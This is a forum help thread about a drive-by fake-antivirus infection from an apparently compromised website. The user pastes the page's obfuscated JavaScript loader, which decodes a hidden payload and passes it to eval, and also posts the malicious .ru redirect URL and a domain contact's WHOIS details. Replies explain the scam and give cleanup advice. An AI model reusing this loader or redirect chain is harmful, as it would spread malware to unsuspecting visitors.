While doing some research I stumbled upon something I have never seen before.

I have tried to research it but I can't find anything about it.

I went to page UNITEDINSIGHT.COM
It automatically redirected to http://www.unitedinsight.com/htttp://reltime2012.ru/frunleh?9

The page was a blank page and about 20 seconds later an app popped up -- it said that a some sort of system protection app was installed and it started "scanning" my system for malware. As soon as I saw this I closed the app.

Kaspersky app did nothing against this thing

After shutting down the app - I went back to try to investigate a bit further, but now I get error

This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/htttp://reltime2012.ru/frunleh?9 has resulted in too many redirects.

So I can't see the malware (or whatever it was) anymore

Has anyone else run into this ?

Website looked legit on Google

WHOIS data

Administrative Contact:
-
David Champion (dchampion13@gmail.com)
+1.6464004671
Fax:
2 Gold St
3401
New York, NY 10038
US

Here is what was in the page

<html><body><script>ZhwDQsg=7;RPvYZn="e";if(document.body.getAttribute("VxBUYR")!=null){ZhwDQsg+=800;RPvYZn="mUxwTV";}if(document.styleSheets.length!=0){ZhwDQsg+=800; RPvYZn="mUxwTV";}UblFPM="v";CUwJZE="g";TzunEPeg="u";NxSvKn="t";gfuANrM="l";CeNIhRi="r";UBgYNkMh="C";MfuVxE="a";PYiZTSgO="b";UXTRShIY="i";ukjhWK="o";UTGQlS="m";KVmdISaf="h";NFTvpm="f";aHGzWJEf="s";pTiPBKU="n";IrPWQkdZ="d";NuxeSU="c";OWgQKuVh="A";mYlCNr="x";QBTXmSwx="O";function vywOrPf(gEbTtceF,KcMhPAW){return gEbTtceF[KcMhPAW];}SmdqRgIn=vywOrPf(window,RPvYZn+UblFPM+MfuVxE+gfu ANrM);WKeDXc=function(rmlRDuwX,aqSwhGF){return rmlRDuwX[aHGzWJEf+TzunEPeg+PYiZTSgO+aHGzWJEf+NxSvKn+CeNIhRi +UXTRShIY+pTiPBKU+CUwJZE](aqSwhGF);};aPnqed=vywOrPf(String,NFTvpm+CeNIhRi+u kjhWK+UTGQlS+UBgYNkMh+KVmdISaf+MfuVxE+CeNIhRi+UBgY NkMh+ukjhWK+IrPWQkdZ+RPvYZn);function jSEZwkm(Tzybet){RYSmdxM="TQdeU5D2O+=HSyzY1g6V9kGRZxuCihWrqLAF8fb3v/IcXmjwEn4lJts7PoMBK0Nap";SBumqtKs=NuxeSU+KVmdISaf+MfuVxE+CeNIhRi+OWgQKuVh+ NxSvKn;UzOlCGv=UXTRShIY+pTiPBKU+IrPWQkdZ+RPvYZn+mY lCNr+QBTXmSwx+NFTvpm;XZvkRC=0;IrwHOhf="tufdJFj";do{SQyCxZRp=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));xmoDHhOg=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));FjqnvWzB=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));xyHnZkO=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));yTCoWA=SQyCxZRp<<18|xmoDHhOg<<12|FjqnvWzB<<6|xyHnZkO;dMSFGWil=yTCoWA>>16&255;FHPqdEJW=yTCoWA>>8&255;fOQWovSe=yTCoWA&255;if(FjqnvWzB==64){IrwHOhf+=aPnqed (dMSFGWil);}else if(xyHnZkO==64){IrwHOhf+=aPnqed(dMSFGWil,FHPqdEJW) ;}else{IrwHOhf+=aPnqed(dMSFGWil,FHPqdEJW,fOQWovSe) ;}}while(XZvkRC<Tzybet.length);return WKeDXc(IrwHOhf,ZhwDQsg);}SmdqRgIn(jSEZwkm("d3g4WRX=ub5sZk0EC2k3uGoruGo8xRqqY6TEz4Q4xRytC21nOe JqSeXqibklhGnJSAT0OeTBdbxwiATvu6T0OeTBOD8qYdQjZRx/xs5JC7OjiDntxsfji4oXxGo3hDqBOD8c=48=WEvqOdTqiAT0Od 0zxRLJOUhfCbk4ZRg/CsPq6b5sZ6Q1C2k3HGfjOdLixdX/RdPvRD1c=kEjRD1cODxwiAQyC7//CDnLOD+4C7hlxR+lHlX=OdTqO2+fi7kXheUqY6Q4HbkPxGSvCb 5suGhLhD04H3QXhGh/C3yCukJjxDklZ7+/i2g/CsP/zEvqOdTquGZq=2+fi7kXheU/dATqOdQBdATqOdTqOdTqZ3+fZGXBdATqOdQ0dATqOdQ4OeJqHJ/LhbUq9Dntx4t/CATvRDgiHfn8Rdoixdqazf0ix2XnHe+0=VK/HlX=OdTqO2+fi7kXheOqY6Q4HbkPxGSvCb5suGhLhD04H3QXhG h/C3yCukJj"+"xDklZ7+/i2g/CsP/zEvqOdTquGZq=2+fi7kXheO/dATqOdQBdATqOdTqOdTqZ3+fZGXBdATqOdQ0d3J=uGZq=2+fi7 kXheU/d3X=OdTqODfbOdL4xRytC21nGl5hOeJ0OeUE=1vqOdTqWEvqOd TqOdTqOD/Lhb5rhbk4isfwCAT0OdOnHFijSdPAOdXqibklhGnJSkX4RVX=O dTqO2J=OdTqODkXis9=OdTqO2X=OdTqOdTqOdQIZRxLR7xfi3y/CsPqY6TAyeOAzEvqOdTqr1/0dbkXis9quGZq=2+fi7kXheO/d3X=OdTqOD/Lhb5rhbk4isfwCAT0O2+fi7kXhe+CSkJBd3J=xGnlx1/BdATqOdQIZRxLR7xfi3y/CsPqY6TACAOBd3J=rGyLhDyv=D9/Ws/Lhb5rhbk4isfwCFJAhG9Az7J=d3g4WRX=uGZq=DoLhbf3ZRgwi AoEC2k3uGolG4hQxD0Ax6QQZ7+wZb5J+tJ/d3X=OdTqO2OqY6Tw1GgwZb9q1Gy4Cs+LhdQ1C2k3H9fjO5xfi3 y/CsPq=5n8Rdoix2XnHe+0=eKMRdoix2XnHe+0=VK/ODxwiAQzxRglZs5Ex6KBdATqOdQ4SAT0Od0QxD0Ax6Q1gUZq9D ntx4t+CAQDC7Oqgbf4xGxwWdQLCb1qVbkJisyLiD9qOFKvRDgB S6E4rkEjRDgBS6E4rkEjRDgBS6E4r68AY4KBdATqOdQ/xATvCb5suGhLhD04H3QXhGh/C3yC+J58Cs+fOU5Fib0AZR13R6osxR+luG0j=1vqOdTqWEvqOd TqOdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqCb5suGhLhD04H3QX hGh/C3yC+J58Cs+fOU5Fib0AZR13R6osxR+luG0jzEvqOdTqr1vqOd TqxGnlx6Q/xATvibklhGnJOeJqiAofWDkF=DoLhbf3ZRgwiAoEC2k3uGolG4 hQxD0Ax6QQZ7+wZb5J+tJjxDklZ7+/i2g/CsP/=1vqOdTqWEvqOdTqOdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqib klhGnJGl5hzEvqOdTqr1vqOdTqxGnlx6Q/xATvibklhGnJOeJqiFOjxRLfZ4LjZRx/xs5JC7OjiDntxsfjitX31GgwZb9q1Gy4Cs+LhdhhHbgfisy4uR QJuG0j=68=OdTqO2X=OdTqOdTqOdQLxD0Axk0ExDxrhbk4isfw CAT0O2+fi7kXh5XnRVX=OdTqO2J=OdTqODkXis9=OdTqO2X=Od TqOdTqOdQLxD0Axk0ExDxrhbk4isfwCAT0Od+tOFX=OdTqO2J= r1/fC2yfd3X=OdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqObPAzE/0d3tFZRgFudLf=RmLxD0Axk0ExDxrhbk4isfwCFJAhG9Az7J=d 3g4WRX=ZGnEuD5AxR1qY6TASVtIgeg1i5y9S2vPk8+vGbmYzR5 mH8kx68L+S8JsxfL7W50e1kkAZJxgy7x6hG5wxGoHibh2VAx8y khlWGn/S4tShdOBdbtfi7yLxs9qY6TAieJA=s58Cs+fR7Q8xf0sxR+luG 0j=4ObuFJA=s/Lhb5rhbk4isfwCFX=CGklis53x6T0ODtfi7yLxs9jibkECD5Fx 6qwH603HdTAR4O/zE/mxRylZGhfOeJqCGklis53x6o4xRQXZGyf=d0iHA03HdTAR4O/zE/JCRTqY6TAOFX=xb04OdL/YVTBOD8KCGklis53x6oXxGo3hDqBOD8c=48=WEvqOdTqRsyvZR OqY6QmxRylZGhfHbyvZR+QhdL/=VX=OdTqODfjxDkPOeJq=D5XiDLLZbkJHbfjxDkPVsZvRsyvZR O/OdXqS68q+6QLC2QvZG+fhdoXxGo3hDqBdATqOdQJCRTq=lJqZG nEuD5AxR1jZsLLi85J=DfjxDkP=VX=r1/mxRylZGhfOeJqhDtEH3+fiDnLZs9vH4Zwx4EqO8EA=6o4xRQXZ Gyf=dK0HsiXOd+5OA8Bdq/JCRTqY6TAOFXqhDtESAT0OdOAz4QJCRTlOeJqOAOBdbxwiATvu VJEz4Q/YDtfi7yLxs9jCDkjx7gvz4Q/=lJt=1/BdATqOdQJCRTq=lJqCGklis53x6olhG+lh2Ovu6Eqy68ji7QXu R1vOAO/H3+fhbk4is9v=6oICsfj=dOA=VX=r1/bC7Oq=D80SeXquVnJCRTjCDkjx7gvz4Q/=lJl=1/BdATqOdQJCRT4OdX0O2gmidolhG+lh2Ovu6EqS48ji7QXuR1vO AO/H3+fhbk4is9v=6oICsfj=dOA=VX=r1/bC7Oq=D80SeXquVnJCRT4HbnfCbhJueXqu6X0SVS/d3X=OdTqO2gmieSq=lJqhDtESAolhG+lh2Ovu6EqSVS/H3yECDfJ=dOA=6o4xRxfi3yf=d8jub0/CAqAOA8Bd3J=CGklis53x6T0O2gmieSBdq/8CsytCGkjhdo7ibfJx6qAY2yFibfEhdQlibS0+40SCFhLV7QOH 4tHxR1P1FkI6fUaWFJA=stfi7yLxs9cOAiNYd0lZ7+/i21A=4ONOA8Bd3tFZRgFudLf=Rm8CsytCGkjhdo7ibfJx6qAY2 yFibfEhdQlibS0+40Li3g/ZsnfHbLJCGEaOAmfHboLCG9cOf0rOAmfHbtfi7yLxs9cOAiNYd 0lZ7+/i21A=4ONOA8Br1vp"));</script></body></html>

clear your cookies.

Yes - I cleared all browsing history and cookies immediately

The odd thing was (I am on Win7) it did not ask me to download or install anything.
This thing just started doing its thing on its own

This is kind of worrisome

This thing just started doing its thing on its own
That's just javascript animation. It didn't necessarily do anything. Usually they tell you afterwards that their scan has found some problems and now you need to download a "fix". That's why you should use NoScript or the like.

That's just javascript animation.

Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.

Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.
Maybe they have shut it down for maintenance?

Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.

A redirect loop happens when a site redirects you somewhere that redirects you back (hence the loop). This is something that's happening with the site itself - it is likely, given the malware type things you were seeing before, that the site has been compromised, and this is now the end result until the site's webmaster gets it fixed.

Something more suspicious

I ran Kaspersky again after an update and it found this file:

c:\Users\Name\AppData\Local\zskknls.exe

Says it is a Trojan: Trojan-FakeAV.Win32.Agent.dxo
with timestamp 9:38 am - at the time I hit the website

Suspicious???

It must be a new one, if kav wasn't finding it before. Has is been executed, though?

I don't know if the exe was executed.
I am now rescanning the system - takes hours - ugggghhhh

I don't know if the exe was executed.
I am now rescanning the system - takes hours - ugggghhhh

I hope you're using a non-windows AV boot disc to scan, other methods are pretty unreliable in comparison.